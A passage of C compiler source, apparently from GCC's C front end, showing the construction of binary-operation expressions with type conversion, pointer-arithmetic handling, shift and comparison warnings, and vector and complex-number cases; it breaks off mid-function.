tree block = NULL;
if (do_scope)
{
if (c_dialect_objc ())
objc_clear_super_receiver ();
block = pop_scope ();
}
stmt = pop_stmt_list (stmt);
stmt = c_build_bind_expr (loc, block, stmt);
/* If this compound statement is nested immediately inside a statement
expression, then force a BIND_EXPR to be created. Otherwise we'll
do the wrong thing for ({ { 1; } }) or ({ 1; { } }). In particular,
STATEMENT_LISTs merge, and thus we can lose track of what statement
was really last. */
if (building_stmt_list_p ()
&& STATEMENT_LIST_STMT_EXPR (cur_stmt_list)
&& TREE_CODE (stmt) != BIND_EXPR)
{
stmt = build3 (BIND_EXPR, void_type_node, NULL, stmt, NULL);
TREE_SIDE_EFFECTS (stmt) = 1;
SET_EXPR_LOCATION (stmt, loc);
}
return stmt;
}
/* Queue a cleanup. CLEANUP is an expression/statement to be executed
when the current scope is exited. EH_ONLY is true when this is not
meant to apply to normal control flow transfer. */
void
push_cleanup (tree decl, tree cleanup, bool eh_only)
{
enum tree_code code;
tree stmt, list;
bool stmt_expr;
code = eh_only ? TRY_CATCH_EXPR : TRY_FINALLY_EXPR;
stmt = build_stmt (DECL_SOURCE_LOCATION (decl), code, NULL, cleanup);
add_stmt (stmt);
stmt_expr = STATEMENT_LIST_STMT_EXPR (cur_stmt_list);
list = push_stmt_list ();
TREE_OPERAND (stmt, 0) = list;
STATEMENT_LIST_STMT_EXPR (list) = stmt_expr;
}
/* Build a vector comparison of ARG0 and ARG1 using CODE opcode
into a value of TYPE type. Comparison is done via VEC_COND_EXPR. */
static tree
build_vec_cmp (tree_code code, tree type,
tree arg0, tree arg1)
{
tree zero_vec = build_zero_cst (type);
tree minus_one_vec = build_minus_one_cst (type);
tree cmp_type = truth_type_for (type);
tree cmp = build2 (code, cmp_type, arg0, arg1);
return build3 (VEC_COND_EXPR, type, cmp, minus_one_vec, zero_vec);
}
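/* Illustrative only: for two v4si operands A and B,
build_vec_cmp (LT_EXPR, v4si_type, a, b) yields a vector whose lanes
are -1 where a[i] < b[i] and 0 elsewhere, matching the GNU
vector-comparison semantics. */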
/* Build a binary-operation expression without default conversions.
CODE is the kind of expression to build.
LOCATION is the operator's location.
This function differs from `build' in several ways:
the data type of the result is computed and recorded in it,
warnings are generated if arg data types are invalid,
special handling for addition and subtraction of pointers is known,
and some optimization is done (operations on narrow ints
are done in the narrower type when that gives the same result).
Constant folding is also done before the result is returned.
Note that the operands will never have enumeral types, or function
or array types, because either they will have the default conversions
performed or they have both just been converted to some other type in which
the arithmetic is to be done. */
tree
build_binary_op (location_t location, enum tree_code code,
tree orig_op0, tree orig_op1, bool convert_p)
{
tree type0, type1, orig_type0, orig_type1;
tree eptype;
enum tree_code code0, code1;
tree op0, op1;
tree ret = error_mark_node;
const char *invalid_op_diag;
bool op0_int_operands, op1_int_operands;
bool int_const, int_const_or_overflow, int_operands;
/* Expression code to give to the expression when it is built.
Normally this is CODE, which is what the caller asked for,
but in some special cases we change it. */
enum tree_code resultcode = code;
/* Data type in which the computation is to be performed.
In the simplest cases this is the common type of the arguments. */
tree result_type = NULL;
/* When the computation is in excess precision, the type of the
final EXCESS_PRECISION_EXPR. */
tree semantic_result_type = NULL;
/* Nonzero means operands have already been type-converted
in whatever way is necessary.
Zero means they need to be converted to RESULT_TYPE. */
int converted = 0;
/* Nonzero means create the expression with this type, rather than
RESULT_TYPE. */
tree build_type = NULL_TREE;
/* Nonzero means after finally constructing the expression
convert it to this type. */
tree final_type = NULL_TREE;
/* Nonzero if this is an operation like MIN or MAX which can
safely be computed in short if both args are promoted shorts.
Also implies COMMON.
-1 indicates a bitwise operation; this makes a difference
in the exact conditions for when it is safe to do the operation
in a narrower mode. */
int shorten = 0;
/* Nonzero if this is a comparison operation;
if both args are promoted shorts, compare the original shorts.
Also implies COMMON. */
int short_compare = 0;
/* Nonzero if this is a right-shift operation, which can be computed on the
original short and then promoted if the operand is a promoted short. */
int short_shift = 0;
/* Nonzero means set RESULT_TYPE to the common type of the args. */
int common = 0;
/* True means types are compatible as far as ObjC is concerned. */
bool objc_ok;
/* True means this is an arithmetic operation that may need excess
precision. */
bool may_need_excess_precision;
/* True means this is a boolean operation that converts both its
operands to truth-values. */
bool boolean_op = false;
/* Remember whether we're doing / or %. */
bool doing_div_or_mod = false;
/* Remember whether we're doing << or >>. */
bool doing_shift = false;
/* Tree holding instrumentation expression. */
tree instrument_expr = NULL;
if (location == UNKNOWN_LOCATION)
location = input_location;
op0 = orig_op0;
op1 = orig_op1;
op0_int_operands = EXPR_INT_CONST_OPERANDS (orig_op0);
if (op0_int_operands)
op0 = remove_c_maybe_const_expr (op0);
op1_int_operands = EXPR_INT_CONST_OPERANDS (orig_op1);
if (op1_int_operands)
op1 = remove_c_maybe_const_expr (op1);
int_operands = (op0_int_operands && op1_int_operands);
if (int_operands)
{
int_const_or_overflow = (TREE_CODE (orig_op0) == INTEGER_CST
&& TREE_CODE (orig_op1) == INTEGER_CST);
int_const = (int_const_or_overflow
&& !TREE_OVERFLOW (orig_op0)
&& !TREE_OVERFLOW (orig_op1));
}
else
int_const = int_const_or_overflow = false;
/* Do not apply default conversions in a mixed vector/scalar expression. */
if (convert_p
&& VECTOR_TYPE_P (TREE_TYPE (op0)) == VECTOR_TYPE_P (TREE_TYPE (op1)))
{
op0 = default_conversion (op0);
op1 = default_conversion (op1);
}
orig_type0 = type0 = TREE_TYPE (op0);
orig_type1 = type1 = TREE_TYPE (op1);
/* The expression codes of the data types of the arguments tell us
whether the arguments are integers, floating, pointers, etc. */
code0 = TREE_CODE (type0);
code1 = TREE_CODE (type1);
/* Strip NON_LVALUE_EXPRs, etc., since we aren't using as an lvalue. */
STRIP_TYPE_NOPS (op0);
STRIP_TYPE_NOPS (op1);
/* If an error was already reported for one of the arguments,
avoid reporting another error. */
if (code0 == ERROR_MARK || code1 == ERROR_MARK)
return error_mark_node;
if (code0 == POINTER_TYPE
&& reject_gcc_builtin (op0, EXPR_LOCATION (orig_op0)))
return error_mark_node;
if (code1 == POINTER_TYPE
&& reject_gcc_builtin (op1, EXPR_LOCATION (orig_op1)))
return error_mark_node;
if ((invalid_op_diag
= targetm.invalid_binary_op (code, type0, type1)))
{
error_at (location, invalid_op_diag);
return error_mark_node;
}
switch (code)
{
case PLUS_EXPR:
case MINUS_EXPR:
case MULT_EXPR:
case TRUNC_DIV_EXPR:
case CEIL_DIV_EXPR:
case FLOOR_DIV_EXPR:
case ROUND_DIV_EXPR:
case EXACT_DIV_EXPR:
may_need_excess_precision = true;
break;
case EQ_EXPR:
case NE_EXPR:
case LE_EXPR:
case GE_EXPR:
case LT_EXPR:
case GT_EXPR:
/* Excess precision for implicit conversions of integers to
floating point in C11 and later. */
may_need_excess_precision = (flag_isoc11
&& (ANY_INTEGRAL_TYPE_P (type0)
|| ANY_INTEGRAL_TYPE_P (type1)));
break;
default:
may_need_excess_precision = false;
break;
}
if (TREE_CODE (op0) == EXCESS_PRECISION_EXPR)
{
op0 = TREE_OPERAND (op0, 0);
type0 = TREE_TYPE (op0);
}
else if (may_need_excess_precision
&& (eptype = excess_precision_type (type0)) != NULL_TREE)
{
type0 = eptype;
op0 = convert (eptype, op0);
}
if (TREE_CODE (op1) == EXCESS_PRECISION_EXPR)
{
op1 = TREE_OPERAND (op1, 0);
type1 = TREE_TYPE (op1);
}
else if (may_need_excess_precision
&& (eptype = excess_precision_type (type1)) != NULL_TREE)
{
type1 = eptype;
op1 = convert (eptype, op1);
}
objc_ok = objc_compare_types (type0, type1, -3, NULL_TREE);
/* In the case when one of the operands of the binary operation is
a vector and the other is a scalar, convert the scalar to a vector. */
if ((gnu_vector_type_p (type0) && code1 != VECTOR_TYPE)
|| (gnu_vector_type_p (type1) && code0 != VECTOR_TYPE))
{
enum stv_conv convert_flag = scalar_to_vector (location, code, op0, op1,
true);
switch (convert_flag)
{
case stv_error:
return error_mark_node;
case stv_firstarg:
{
bool maybe_const = true;
tree sc;
sc = c_fully_fold (op0, false, &maybe_const);
sc = save_expr (sc);
sc = convert (TREE_TYPE (type1), sc);
op0 = build_vector_from_val (type1, sc);
if (!maybe_const)
op0 = c_wrap_maybe_const (op0, true);
orig_type0 = type0 = TREE_TYPE (op0);
code0 = TREE_CODE (type0);
converted = 1;
break;
}
case stv_secondarg:
{
bool maybe_const = true;
tree sc;
sc = c_fully_fold (op1, false, &maybe_const);
sc = save_expr (sc);
sc = convert (TREE_TYPE (type0), sc);
op1 = build_vector_from_val (type0, sc);
if (!maybe_const)
op1 = c_wrap_maybe_const (op1, true);
orig_type1 = type1 = TREE_TYPE (op1);
code1 = TREE_CODE (type1);
converted = 1;
break;
}
default:
break;
}
}
switch (code)
{
case PLUS_EXPR:
/* Handle the pointer + int case. */
if (code0 == POINTER_TYPE && code1 == INTEGER_TYPE)
{
ret = pointer_int_sum (location, PLUS_EXPR, op0, op1);
goto return_build_binary_op;
}
else if (code1 == POINTER_TYPE && code0 == INTEGER_TYPE)
{
ret = pointer_int_sum (location, PLUS_EXPR, op1, op0);
goto return_build_binary_op;
}
else
common = 1;
break;
case MINUS_EXPR:
/* Subtraction of two similar pointers.
We must subtract them as integers, then divide by object size. */
if (code0 == POINTER_TYPE && code1 == POINTER_TYPE
&& comp_target_types (location, type0, type1))
{
ret = pointer_diff (location, op0, op1, &instrument_expr);
goto return_build_binary_op;
}
/* Handle pointer minus int. Just like pointer plus int. */
else if (code0 == POINTER_TYPE && code1 == INTEGER_TYPE)
{
ret = pointer_int_sum (location, MINUS_EXPR, op0, op1);
goto return_build_binary_op;
}
else
common = 1;
break;
case MULT_EXPR:
common = 1;
break;
case TRUNC_DIV_EXPR:
case CEIL_DIV_EXPR:
case FLOOR_DIV_EXPR:
case ROUND_DIV_EXPR:
case EXACT_DIV_EXPR:
doing_div_or_mod = true;
warn_for_div_by_zero (location, op1);
if ((code0 == INTEGER_TYPE || code0 == REAL_TYPE
|| code0 == FIXED_POINT_TYPE
|| code0 == COMPLEX_TYPE
|| gnu_vector_type_p (type0))
&& (code1 == INTEGER_TYPE || code1 == REAL_TYPE
|| code1 == FIXED_POINT_TYPE
|| code1 == COMPLEX_TYPE
|| gnu_vector_type_p (type1)))
{
enum tree_code tcode0 = code0, tcode1 = code1;
if (code0 == COMPLEX_TYPE || code0 == VECTOR_TYPE)
tcode0 = TREE_CODE (TREE_TYPE (TREE_TYPE (op0)));
if (code1 == COMPLEX_TYPE || code1 == VECTOR_TYPE)
tcode1 = TREE_CODE (TREE_TYPE (TREE_TYPE (op1)));
if (!((tcode0 == INTEGER_TYPE && tcode1 == INTEGER_TYPE)
|| (tcode0 == FIXED_POINT_TYPE && tcode1 == FIXED_POINT_TYPE)))
resultcode = RDIV_EXPR;
else
/* Although it would be tempting to shorten always here, that
loses on some targets, since the modulo instruction is
undefined if the quotient can't be represented in the
computation mode. We shorten only if unsigned or if
dividing by something we know != -1. */
shorten = (TYPE_UNSIGNED (TREE_TYPE (orig_op0))
|| (TREE_CODE (op1) == INTEGER_CST
&& !integer_all_onesp (op1)));
common = 1;
}
break;
case BIT_AND_EXPR:
case BIT_IOR_EXPR:
case BIT_XOR_EXPR:
if (code0 == INTEGER_TYPE && code1 == INTEGER_TYPE)
shorten = -1;
/* Allow vector types which are not floating point types. */
else if (gnu_vector_type_p (type0)
&& gnu_vector_type_p (type1)
&& !VECTOR_FLOAT_TYPE_P (type0)
&& !VECTOR_FLOAT_TYPE_P (type1))
common = 1;
break;
case TRUNC_MOD_EXPR:
case FLOOR_MOD_EXPR:
doing_div_or_mod = true;
warn_for_div_by_zero (location, op1);
if (gnu_vector_type_p (type0)
&& gnu_vector_type_p (type1)
&& TREE_CODE (TREE_TYPE (type0)) == INTEGER_TYPE
&& TREE_CODE (TREE_TYPE (type1)) == INTEGER_TYPE)
common = 1;
else if (code0 == INTEGER_TYPE && code1 == INTEGER_TYPE)
{
/* Although it would be tempting to shorten always here, that loses
on some targets, since the modulo instruction is undefined if the
quotient can't be represented in the computation mode. We shorten
only if unsigned or if dividing by something we know != -1. */
shorten = (TYPE_UNSIGNED (TREE_TYPE (orig_op0))
|| (TREE_CODE (op1) == INTEGER_CST
&& !integer_all_onesp (op1)));
common = 1;
}
break;
case TRUTH_ANDIF_EXPR:
case TRUTH_ORIF_EXPR:
case TRUTH_AND_EXPR:
case TRUTH_OR_EXPR:
case TRUTH_XOR_EXPR:
if ((code0 == INTEGER_TYPE || code0 == POINTER_TYPE
|| code0 == REAL_TYPE || code0 == COMPLEX_TYPE
|| code0 == FIXED_POINT_TYPE)
&& (code1 == INTEGER_TYPE || code1 == POINTER_TYPE
|| code1 == REAL_TYPE || code1 == COMPLEX_TYPE
|| code1 == FIXED_POINT_TYPE))
{
/* Result of these operations is always an int,
but that does not mean the operands should be
converted to ints! */
result_type = integer_type_node;
if (op0_int_operands)
{
op0 = c_objc_common_truthvalue_conversion (location, orig_op0);
op0 = remove_c_maybe_const_expr (op0);
}
else
op0 = c_objc_common_truthvalue_conversion (location, op0);
if (op1_int_operands)
{
op1 = c_objc_common_truthvalue_conversion (location, orig_op1);
op1 = remove_c_maybe_const_expr (op1);
}
else
op1 = c_objc_common_truthvalue_conversion (location, op1);
converted = 1;
boolean_op = true;
}
if (code == TRUTH_ANDIF_EXPR)
{
int_const_or_overflow = (int_operands
&& TREE_CODE (orig_op0) == INTEGER_CST
&& (op0 == truthvalue_false_node
|| TREE_CODE (orig_op1) == INTEGER_CST));
int_const = (int_const_or_overflow
&& !TREE_OVERFLOW (orig_op0)
&& (op0 == truthvalue_false_node
|| !TREE_OVERFLOW (orig_op1)));
}
else if (code == TRUTH_ORIF_EXPR)
{
int_const_or_overflow = (int_operands
&& TREE_CODE (orig_op0) == INTEGER_CST
&& (op0 == truthvalue_true_node
|| TREE_CODE (orig_op1) == INTEGER_CST));
int_const = (int_const_or_overflow
&& !TREE_OVERFLOW (orig_op0)
&& (op0 == truthvalue_true_node
|| !TREE_OVERFLOW (orig_op1)));
}
break;
/* Shift operations: result has same type as first operand;
always convert second operand to int.
Also set SHORT_SHIFT if shifting rightward. */
case RSHIFT_EXPR:
if (gnu_vector_type_p (type0)
&& gnu_vector_type_p (type1)
&& TREE_CODE (TREE_TYPE (type0)) == INTEGER_TYPE
&& TREE_CODE (TREE_TYPE (type1)) == INTEGER_TYPE
&& known_eq (TYPE_VECTOR_SUBPARTS (type0),
TYPE_VECTOR_SUBPARTS (type1)))
{
result_type = type0;
converted = 1;
}
else if ((code0 == INTEGER_TYPE || code0 == FIXED_POINT_TYPE
|| (gnu_vector_type_p (type0)
&& TREE_CODE (TREE_TYPE (type0)) == INTEGER_TYPE))
&& code1 == INTEGER_TYPE)
{
doing_shift = true;
if (TREE_CODE (op1) == INTEGER_CST)
{
if (tree_int_cst_sgn (op1) < 0)
{
int_const = false;
if (c_inhibit_evaluation_warnings == 0)
warning_at (location, OPT_Wshift_count_negative,
"right shift count is negative");
}
else if (code0 == VECTOR_TYPE)
{
if (compare_tree_int (op1,
TYPE_PRECISION (TREE_TYPE (type0)))
>= 0)
{
int_const = false;
if (c_inhibit_evaluation_warnings == 0)
warning_at (location, OPT_Wshift_count_overflow,
"right shift count >= width of vector element");
}
}
else
{
if (!integer_zerop (op1))
short_shift = 1;
if (compare_tree_int (op1, TYPE_PRECISION (type0)) >= 0)
{
int_const = false;
if (c_inhibit_evaluation_warnings == 0)
warning_at (location, OPT_Wshift_count_overflow,
"right shift count >= width of type");
}
}
}
/* Use the type of the value to be shifted. */
result_type = type0;
/* Avoid converting op1 to result_type later. */
converted = 1;
}
break;
case LSHIFT_EXPR:
if (gnu_vector_type_p (type0)
&& gnu_vector_type_p (type1)
&& TREE_CODE (TREE_TYPE (type0)) == INTEGER_TYPE
&& TREE_CODE (TREE_TYPE (type1)) == INTEGER_TYPE
&& known_eq (TYPE_VECTOR_SUBPARTS (type0),
TYPE_VECTOR_SUBPARTS (type1)))
{
result_type = type0;
converted = 1;
}
else if ((code0 == INTEGER_TYPE || code0 == FIXED_POINT_TYPE
|| (gnu_vector_type_p (type0)
&& TREE_CODE (TREE_TYPE (type0)) == INTEGER_TYPE))
&& code1 == INTEGER_TYPE)
{
doing_shift = true;
if (TREE_CODE (op0) == INTEGER_CST
&& tree_int_cst_sgn (op0) < 0)
{
/* Don't reject a left shift of a negative value in a context
where a constant expression is needed in C90. */
if (flag_isoc99)
int_const = false;
if (c_inhibit_evaluation_warnings == 0)
warning_at (location, OPT_Wshift_negative_value,
"left shift of negative value");
}
if (TREE_CODE (op1) == INTEGER_CST)
{
if (tree_int_cst_sgn (op1) < 0)
{
int_const = false;
if (c_inhibit_evaluation_warnings == 0)
warning_at (location, OPT_Wshift_count_negative,
"left shift count is negative");
}
else if (code0 == VECTOR_TYPE)
{
if (compare_tree_int (op1,
TYPE_PRECISION (TREE_TYPE (type0)))
>= 0)
{
int_const = false;
if (c_inhibit_evaluation_warnings == 0)
warning_at (location, OPT_Wshift_count_overflow,
"left shift count >= width of vector element");
}
}
else if (compare_tree_int (op1, TYPE_PRECISION (type0)) >= 0)
{
int_const = false;
if (c_inhibit_evaluation_warnings == 0)
warning_at (location, OPT_Wshift_count_overflow,
"left shift count >= width of type");
}
else if (TREE_CODE (op0) == INTEGER_CST
&& maybe_warn_shift_overflow (location, op0, op1)
&& flag_isoc99)
int_const = false;
}
/* Use the type of the value to be shifted. */
result_type = type0;
/* Avoid converting op1 to result_type later. */
converted = 1;
}
break;
case EQ_EXPR:
case NE_EXPR:
if (gnu_vector_type_p (type0) && gnu_vector_type_p (type1))
{
tree intt;
if (!vector_types_compatible_elements_p (type0, type1))
{
error_at (location, "comparing vectors with different "
"element types");
return error_mark_node;
}
if (maybe_ne (TYPE_VECTOR_SUBPARTS (type0),
TYPE_VECTOR_SUBPARTS (type1)))
{
error_at (location, "comparing vectors with different "
"number of elements");
return error_mark_node;
}
/* It's not precisely specified how the usual arithmetic
conversions apply to the vector types. Here, we use
the unsigned type if one of the operands is signed and
the other one is unsigned. */
if (TYPE_UNSIGNED (type0) != TYPE_UNSIGNED (type1))
{
if (!TYPE_UNSIGNED (type0))
op0 = build1 (VIEW_CONVERT_EXPR, type1, op0);
else
op1 = build1 (VIEW_CONVERT_EXPR, type0, op1);
warning_at (location, OPT_Wsign_compare, "comparison between "
"types %qT and %qT", type0, type1);
}
/* Always construct signed integer vector type. */
intt = c_common_type_for_size (GET_MODE_BITSIZE
(SCALAR_TYPE_MODE
(TREE_TYPE (type0))), 0);
if (!intt)
{
error_at (location, "could not find an integer type "
"of the same size as %qT",
TREE_TYPE (type0));
return error_mark_node;
}
result_type = build_opaque_vector_type (intt,
TYPE_VECTOR_SUBPARTS (type0));
converted = 1;
ret = build_vec_cmp (resultcode, result_type, op0, op1);
goto return_build_binary_op;
}
if (FLOAT_TYPE_P (type0) || FLOAT_TYPE_P (type1))
warning_at (location,
OPT_Wfloat_equal,
"comparing floating-point with %<==%> or %<!=%> is unsafe");
/* Result of comparison is always int,
but don't convert the args to int! */
build_type = integer_type_node;
if ((code0 == INTEGER_TYPE || code0 == REAL_TYPE
|| code0 == FIXED_POINT_TYPE || code0 == COMPLEX_TYPE)
&& (code1 == INTEGER_TYPE || code1 == REAL_TYPE
|| code1 == FIXED_POINT_TYPE || code1 == COMPLEX_TYPE))
short_compare = 1;
else if (code0 == POINTER_TYPE && null_pointer_constant_p (orig_op1))
{
if (TREE_CODE (op0) == ADDR_EXPR
&& decl_with_nonnull_addr_p (TREE_OPERAND (op0, 0))
&& !from_macro_expansion_at (location))
{
if (code == EQ_EXPR)
warning_at (location,
OPT_Waddress,
"the comparison will always evaluate as %<false%> "
"for the address of %qD will never be NULL",
TREE_OPERAND (op0, 0));
else
warning_at (location,
OPT_Waddress,
"the comparison will always evaluate as %<true%> "
"for the address of %qD will never be NULL",
TREE_OPERAND (op0, 0));
}
result_type = type0;
}
else if (code1 == POINTER_TYPE && null_pointer_constant_p (orig_op0))
{
if (TREE_CODE (op1) == ADDR_EXPR
&& decl_with_nonnull_addr_p (TREE_OPERAND (op1, 0))
&& !from_macro_expansion_at (location))
{
if (code == EQ_EXPR)
warning_at (location,
OPT_Waddress,
"the comparison will always evaluate as %<false%> "
"for the address of %qD will never be NULL",
TREE_OPERAND (op1, 0));
else
warning_at (location,
OPT_Waddress,
"the comparison will always evaluate as %<true%> "
"for the address of %qD will never be NULL",
TREE_OPERAND (op1, 0));
}
result_type = type1;
}
else if (code0 == POINTER_TYPE && code1 == POINTER_TYPE)
{
tree tt0 = TREE_TYPE (type0);
tree tt1 = TREE_TYPE (type1);
addr_space_t as0 = TYPE_ADDR_SPACE (tt0);
addr_space_t as1 = TYPE_ADDR_SPACE (tt1);
addr_space_t as_common = ADDR_SPACE_GENERIC;
/* Anything compares with void *. void * compares with anything.
Otherwise, the targets must be compatible
and both must be object or both incomplete. */
if (comp_target_types (location, type0, type1))
result_type = common_pointer_type (type0, type1);
else if (!addr_space_superset (as0, as1, &as_common))
{
error_at (location, "comparison of pointers to "
"disjoint address spaces");
return error_mark_node;
}
else if (VOID_TYPE_P (tt0) && !TYPE_ATOMIC (tt0))
{
if (pedantic && TREE_CODE (tt1) == FUNCTION_TYPE)
pedwarn (location, OPT_Wpedantic, "ISO C forbids "
"comparison of %<void *%> with function pointer");
}
else if (VOID_TYPE_P (tt1) && !TYPE_ATOMIC (tt1))
{
if (pedantic && TREE_CODE (tt0) == FUNCTION_TYPE)
pedwarn (location, OPT_Wpedantic, "ISO C forbids "
"comparison of %<void *%> with function pointer");
}
else
/* Avoid warning about the volatile ObjC EH puts on decls. */
if (!objc_ok)
pedwarn (location, 0,
"comparison of distinct pointer types lacks a cast");
if (result_type == NULL_TREE)
{
int qual = ENCODE_QUAL_ADDR_SPACE (as_common);
result_type = build_pointer_type
(build_qualified_type (void_type_node, qual));
}
}
else if (code0 == POINTER_TYPE && code1 == INTEGER_TYPE)
{
result_type = type0;
pedwarn (location, 0, "comparison between pointer and integer");
}
else if (code0 == INTEGER_TYPE && code1 == POINTER_TYPE)
{
result_type = type1;
pedwarn (location, 0, "comparison between pointer and integer");
}
if ((TREE_CODE (TREE_TYPE (orig_op0)) == BOOLEAN_TYPE
|| truth_value_p (TREE_CODE (orig_op0)))
^ (TREE_CODE (TREE_TYPE (orig_op1)) == BOOLEAN_TYPE
|| truth_value_p (TREE_CODE (orig_op1))))
maybe_warn_bool_compare (location, code, orig_op0, orig_op1);
break;
case LE_EXPR:
case GE_EXPR:
case LT_EXPR:
case GT_EXPR:
if (gnu_vector_type_p (type0) && gnu_vector_type_p (type1))
{
tree intt;
if (!vector_types_compatible_elements_p (type0, type1))
{
error_at (location, "comparing vectors with different "
"element types");
return error_mark_node;
}
if (maybe_ne (TYPE_VECTOR_SUBPARTS (type0),
TYPE_VECTOR_SUBPARTS (type1)))
{
error_at (location, "comparing vectors with different "
"number of elements");
return error_mark_node;
}
/* It's not precisely specified how the usual arithmetic
conversions apply to the vector types. Here, we use
the unsigned type if one of the operands is signed and
the other one is unsigned. */
if (TYPE_UNSIGNED (type0) != TYPE_UNSIGNED (type1))
{
if (!TYPE_UNSIGNED (type0))
op0 = build1 (VIEW_CONVERT_EXPR, type1, op0);
else
op1 = build1 (VIEW_CONVERT_EXPR, type0, op1);
warning_at (location, OPT_Wsign_compare, "comparison between "
"types %qT and %qT", type0, type1);
}
/* Always construct signed integer vector type. */
intt = c_common_type_for_size (GET_MODE_BITSIZE
(SCALAR_TYPE_MODE
(TREE_TYPE (type0))), 0);
if (!intt)
{
error_at (location, "could not find an integer type "
"of the same size as %qT",
TREE_TYPE (type0));
return error_mark_node;
}
result_type = build_opaque_vector_type (intt,
TYPE_VECTOR_SUBPARTS (type0));
converted = 1;
ret = build_vec_cmp (resultcode, result_type, op0, op1);
goto return_build_binary_op;
}
build_type = integer_type_node;
if ((code0 == INTEGER_TYPE || code0 == REAL_TYPE
|| code0 == FIXED_POINT_TYPE)
&& (code1 == INTEGER_TYPE || code1 == REAL_TYPE
|| code1 == FIXED_POINT_TYPE))
short_compare = 1;
else if (code0 == POINTER_TYPE && code1 == POINTER_TYPE)
{
addr_space_t as0 = TYPE_ADDR_SPACE (TREE_TYPE (type0));
addr_space_t as1 = TYPE_ADDR_SPACE (TREE_TYPE (type1));
addr_space_t as_common;
if (comp_target_types (location, type0, type1))
{
result_type = common_pointer_type (type0, type1);
if (!COMPLETE_TYPE_P (TREE_TYPE (type0))
!= !COMPLETE_TYPE_P (TREE_TYPE (type1)))
pedwarn (location, 0,
"comparison of complete and incomplete pointers");
else if (TREE_CODE (TREE_TYPE (type0)) == FUNCTION_TYPE)
pedwarn (location, OPT_Wpedantic, "ISO C forbids "
"ordered comparisons of pointers to functions");
else if (null_pointer_constant_p (orig_op0)
|| null_pointer_constant_p (orig_op1))
warning_at (location, OPT_Wextra,
"ordered comparison of pointer with null pointer");
}
else if (!addr_space_superset (as0, as1, &as_common))
{
error_at (location, "comparison of pointers to "
"disjoint address spaces");
return error_mark_node;
}
else
{
int qual = ENCODE_QUAL_ADDR_SPACE (as_common);
result_type = build_pointer_type
(build_qualified_type (void_type_node, qual));
pedwarn (location, 0,
"comparison of distinct pointer types lacks a cast");
}
}
else if (code0 == POINTER_TYPE && null_pointer_constant_p (orig_op1))
{
result_type = type0;
if (pedantic)
pedwarn (location, OPT_Wpedantic,
"ordered comparison of pointer with integer zero");
else if (extra_warnings)
warning_at (location, OPT_Wextra,
"ordered comparison of pointer with integer zero");
}
else if (code1 == POINTER_TYPE && null_pointer_constant_p (orig_op0))
{
result_type = type1;
if (pedantic)
pedwarn (location, OPT_Wpedantic,
"ordered comparison of pointer with integer zero");
else if (extra_warnings)
warning_at (location, OPT_Wextra,
"ordered comparison of pointer with integer zero");
}
else if (code0 == POINTER_TYPE && code1 == INTEGER_TYPE)
{
result_type = type0;
pedwarn (location, 0, "comparison between pointer and integer");
}
else if (code0 == INTEGER_TYPE && code1 == POINTER_TYPE)
{
result_type = type1;
pedwarn (location, 0, "comparison between pointer and integer");
}
if ((code0 == POINTER_TYPE || code1 == POINTER_TYPE)
&& sanitize_flags_p (SANITIZE_POINTER_COMPARE))
{
op0 = save_expr (op0);
op1 = save_expr (op1);
tree tt = builtin_decl_explicit (BUILT_IN_ASAN_POINTER_COMPARE);
instrument_expr = build_call_expr_loc (location, tt, 2, op0, op1);
}
if ((TREE_CODE (TREE_TYPE (orig_op0)) == BOOLEAN_TYPE
|| truth_value_p (TREE_CODE (orig_op0)))
^ (TREE_CODE (TREE_TYPE (orig_op1)) == BOOLEAN_TYPE
|| truth_value_p (TREE_CODE (orig_op1))))
maybe_warn_bool_compare (location, code, orig_op0, orig_op1);
break;
default:
gcc_unreachable ();
}
if (code0 == ERROR_MARK || code1 == ERROR_MARK)
return error_mark_node;
if (gnu_vector_type_p (type0)
&& gnu_vector_type_p (type1)
&& (!tree_int_cst_equal (TYPE_SIZE (type0), TYPE_SIZE (type1))
|| !vector_types_compatible_elements_p (type0, type1)))
{
gcc_rich_location richloc (location);
maybe_range_label_for_tree_type_mismatch
label_for_op0 (orig_op0, orig_op1),
label_for_op1 (orig_op1, orig_op0);
richloc.maybe_add_expr (orig_op0, &label_for_op0);
richloc.maybe_add_expr (orig_op1, &label_for_op1);
binary_op_error (&richloc, code, type0, type1);
return error_mark_node;
}
if ((code0 == INTEGER_TYPE || code0 == REAL_TYPE || code0 == COMPLEX_TYPE
|| code0 == FIXED_POINT_TYPE
|| gnu_vector_type_p (type0))
&&
(code1 == INTEGER_TYPE || code1 == REAL_TYPE || code1 == COMPLEX_TYPE
|| code1 == FIXED_POINT_TYPE
|| gnu_vector_type_p (type1)))
{
bool first_complex = (code0 == COMPLEX_TYPE);
bool second_complex = (code1 == COMPLEX_TYPE);
int none_complex = (!first_complex && !second_complex);
if (shorten || common || short_compare)
{
result_type = c_common_type (type0, type1);
do_warn_double_promotion (result_type, type0, type1,
"implicit conversion from %qT to %qT "
"to match other operand of binary "
"expression",
location);
if (result_type == error_mark_node)
return error_mark_node;
}
if (first_complex != second_complex
&& (code == PLUS_EXPR
|| code == MINUS_EXPR
|| code == MULT_EXPR
|| (code == TRUNC_DIV_EXPR && first_complex))
&& TREE_CODE (TREE_TYPE (result_type)) == REAL_TYPE
&& flag_signed_zeros)
{
/* An operation on mixed real/complex operands must be
handled specially, but the language-independent code can
more easily optimize the plain complex arithmetic if
-fno-signed-zeros. */
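/* E.g. for COMPLEX + REAL only the real part changes; converting
the real operand to a complex with a +0.0 imaginary part and doing
a full complex addition could flip the sign of a negative zero
imaginary part, since -0.0 + +0.0 is +0.0. */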
tree real_type = TREE_TYPE (result_type);
tree real, imag;
if (type0 != orig_type0 || type1 != orig_type1)
{
gcc_assert (may_need_excess_precision && common);
semantic_result_type = c_common_type (orig_type0, orig_type1);
}
if (first_complex)
{
if (TREE_TYPE (op0) != result_type)
op0 = convert_and_check (location, result_type, op0);
if (TREE_TYPE (op1) != real_type)
op1 = convert_and_check (location, real_type, op1);
}
else
{
if (TREE_TYPE (op0) != real_type)
op0 = convert_and_check (location, real_type, op0);
if (TREE_TYPE (op1) != result_type)
op1 = convert_and_check (location, result_type, op1);
}
if (TREE_CODE (op0) == ERROR_MARK || TREE_CODE (op1) == ERROR_MARK)
return error_mark_node;
if (first_complex)
{
op0 = save_expr (op0);
real = build_unary_op (EXPR_LOCATION (orig_op0), REALPART_EXPR,
op0, true);
imag = build_unary_op (EXPR_LOCATION (orig_op0), IMAGPART_EXPR,
op0, true);
switch (code)
{
case MULT_EXPR:
case TRUNC_DIV_EXPR:
op1 = save_expr (op1);
imag = build2 (resultcode, real_type, imag, op1);
/* Fall through. */
case PLUS_EXPR:
case MINUS_EXPR:
real = build2 (resultcode, real_type, real, op1);
break;
default:
gcc_unreachable();
}
}
else
{
